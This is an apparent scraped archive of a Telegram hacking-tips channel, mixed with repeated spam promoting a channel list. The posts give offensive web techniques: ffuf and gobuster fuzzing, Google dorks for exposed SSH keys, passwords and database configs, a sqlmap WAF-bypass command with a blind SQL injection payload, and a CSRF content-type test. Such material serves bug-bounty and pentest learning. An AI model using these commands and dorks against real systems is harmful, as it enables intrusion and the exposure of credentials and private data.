ExploitQuest
Kanalga Telegram’da o‘tish
contact: @ExploitQuestbot
Ko'proq ko'rsatishMamlakat belgilanmaganTexnologiyalar & Aralashmalar14 073
6 808
Obunachilar
Ma'lumot yo'q24 soatlar
+97 kun
+12430 kun
Postlar arxiv
6 808
How do hackers find hidden pages on your site?
It's not magic, it's technique.
It's called Web Fuzzing.
And if you're a developer, a pentester, or just curious, you know that this method is daunting.
Here is a quick example with a well-known tool, but that admins forget too quickly: FFUF (Fuzz Faster U Fool).
🛠 Examples of use:
• Fuzzing with custom headers:
ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ -H "Custom-Header: value"• Recursive Fuzzing with Specific Depth:
ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ -recursion -recursion-depth 2• Targeting specific patterns in responses:
ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ -mr "regex-pattern"Why does it work? Because sites are like untidy houses. There is always a door left ajar. Fuzzing uses lists of words (often obvious combinations or common names) to force URLs, explore forgotten areas... and reveal login pages, more or less sensitive resources. But the real danger? It is not the tool. It is a site that was designed without taking these attacks into account.
6 808
Repost from N/a
⚠️All those who are open Telegram now lucky minutes and delete the link ⏳
Join quickly, it is an opportunity to subscribe👇💓
🤍https://t.me/addlist/2155mgzrShZlNGZk
🤍https://t.me/addlist/2155mgzrShZlNGZk
6 808
Repost from N/a
✨🎓 For lovers of free courses and fans of cybersecurity, malware, and hacking tools, we present to you the technological list. 💻🔐
Here, you will find all the channels that provide you with this and more! 🚀
🔗 Join now:
https://t.me/addlist/2155mgzrShZlNGZk
https://t.me/addlist/2155mgzrShZlNGZk
✅ To add your channel to the list, contact: @Yousef_404_x
6 808
Here are 10 Google Dorks that are new and useful for bug bounty hunters during reconnaissance:1•Finding Configuration or Settings Files
inurl:settings filetype:json OR filetype:xml•Purpose: Locate configuration files that might contain sensitive keys or settings. 2•Searching for Backup Files on Servers
intitle:index.of "backup" OR "bkp" OR "bak"•Purpose: Identify exposed backup files in public directories. 3•Discovering Application Error Logs
inurl:error.log OR inurl:debug.log filetype:log•Purpose: Find log files that may reveal sensitive server paths or IP addresses. 4•Locating Database Configuration Files
inurl:dbconfig OR inurl:database filetype:ini OR filetype:env•Purpose: Expose database settings or credentials. 5•Finding Exposed API Endpoints
inurl:api OR inurl:swagger filetype:json•Purpose: Identify exposed APIs or Swagger documentation. 6•Searching for Private SSH Keys
intitle:index.of id_rsa OR id_dsa filetype:key•Purpose: Detect publicly accessible SSH private keys. 7•Exposing Hardcoded Passwords
intext:"password=" OR "pwd=" OR "pass=" filetype:properties OR filetype:txt•Purpose: Find plaintext passwords in configuration or text files. 8•Finding Confidential Documents
site:example.com filetype:pdf OR filetype:xls "confidential"•Purpose: Locate sensitive or confidential documents. 9•Detecting Files with Exported Data
inurl:exports OR inurl:downloads filetype:csv OR filetype:txt•Purpose: Discover exported user data or logs. 10•Identifying Cloud Configuration Files
intext:"cloud" OR "aws" OR "gcp" filetype:yml OR filetype:yaml•Purpose: Expose cloud service configurations such as AWS or GCP.
6 808
Repost from N/a
✨🎓 For lovers of free courses and fans of cybersecurity, malware, and hacking tools, we present to you the technological list. 💻🔐
Here, you will find all the channels that provide you with this and more! 🚀
🔗 Join now:
https://t.me/addlist/2155mgzrShZlNGZk
https://t.me/addlist/2155mgzrShZlNGZk
✅ To add your channel to the list, contact: @Yousef_404_x
6 808
+1
Bypass waf for SQL injection :)
cloudflare
command :
sqlmap -u "target.com" --dbs --batch --time-sec 10 --level 3 --hex --random-agent --tamper=space2comment,betweeny
time-based blind:
+AND+(SELECT+5140+FROM+(SELECT(SLEEP(10)))lfTO)6 808
One line to find all subdomains of a target site and list the favicon hashes.
The latter can be used in conjunction with Shodan to find all web applications using the same favicon.
subfinder -d canva.com | httpx -favicon -j | jq -r .favicon | grep -v null | sort-u6 808
Repost from N/a
✨🎓 For lovers of free courses and fans of cybersecurity, malware, and hacking tools, we present to you the technological list. 💻🔐
Here, you will find all the channels that provide you with this and more! 🚀
🔗 Join now:
https://t.me/addlist/2155mgzrShZlNGZk
https://t.me/addlist/2155mgzrShZlNGZk
✅ To add your channel to the list, contact: @Yousef_404_x
6 808
If you have a JSON query that you "control", you can test blind SQL injection as in the picture above. And then:
sqlmap -u ' target.com ' --data '{"User":"abcdefg","Pwd":"Abc@123"}' --random-agent --ignore-code=403 --dbs --hex6 808
Repost from N/a
🟢خسران اذا عندك تيلجرام وما عندك هذه القناة💎
📣 لكل محبين و عشاق الأمن السيبراني 🛡و البرمجة جمعنا لكم كل القنوات السيبرانية و البرمجية و التي تقدم لكم مقالات و كورسات و كتب المجانية 🆓
🔗https://t.me/addlist/2155mgzrShZlNGZk
🔗https://t.me/addlist/2155mgzrShZlNGZk
✅ لإضافة قناتك للسته التقنية تواصل مع:
@Yousef_404_X
🔤🔤🔤🔤🔤🔤🔤🔤🔤
6 808
A simple CSRF bypass to check if your target is sending JSON data without an anti-CSRF tokenChange the content type from application/json to text/plain and see if it still accepts the request Steps to Check for CSRF Bypass Identify the Target Request: Find the endpoint that accepts JSON data and requires CSRF protection. Capture the Request: Use tools like Burp Suite, Postman, or browser developer tools to capture the original request. Original Request (expected by the server):
POST /api/profile HTTP/2 Host: app.example.com Cookie: sess=eyJ... # Session Cookie Content-Type: application/json { "email": "test@example.com" }Modified Request (for testing CSRF bypass):
POST /api/profile HTTP/2 Host: app.example.com Cookie: sess=eyJ... # Session Cookie Content-Type: text/plain { "email": "test@example.com" }Expected Results: If the server accepts the request: The endpoint may not validate the Content-Type. This can allow a malicious actor to exploit the endpoint using CSRF. If the server rejects the request: It validates the Content-Type, which is a good security practice. This reduces the risk of CSRF exploitation
6 808
Bruteforce directories and files :
a simple example of using gobuster , but you can also work with ffuf , feroxbuster and other tools
• dir : directory scanning mode
• -u : target URL
• -w : path to dictionary
Other useful parameters:
• -x : file extensions ( .php , .html )
• -t : number of threads
• -c : cookie
6 808
Repost from N/a
🟢خسران اذا عندك تيلجرام وما عندك هذه القناة💎
🔗https://t.me/addlist/2155mgzrShZlNGZk
🔗https://t.me/addlist/2155mgzrShZlNGZk
✅ لإضافة قناتك للسته التقنية تواصل مع:
@Yousef_404_X 🛡
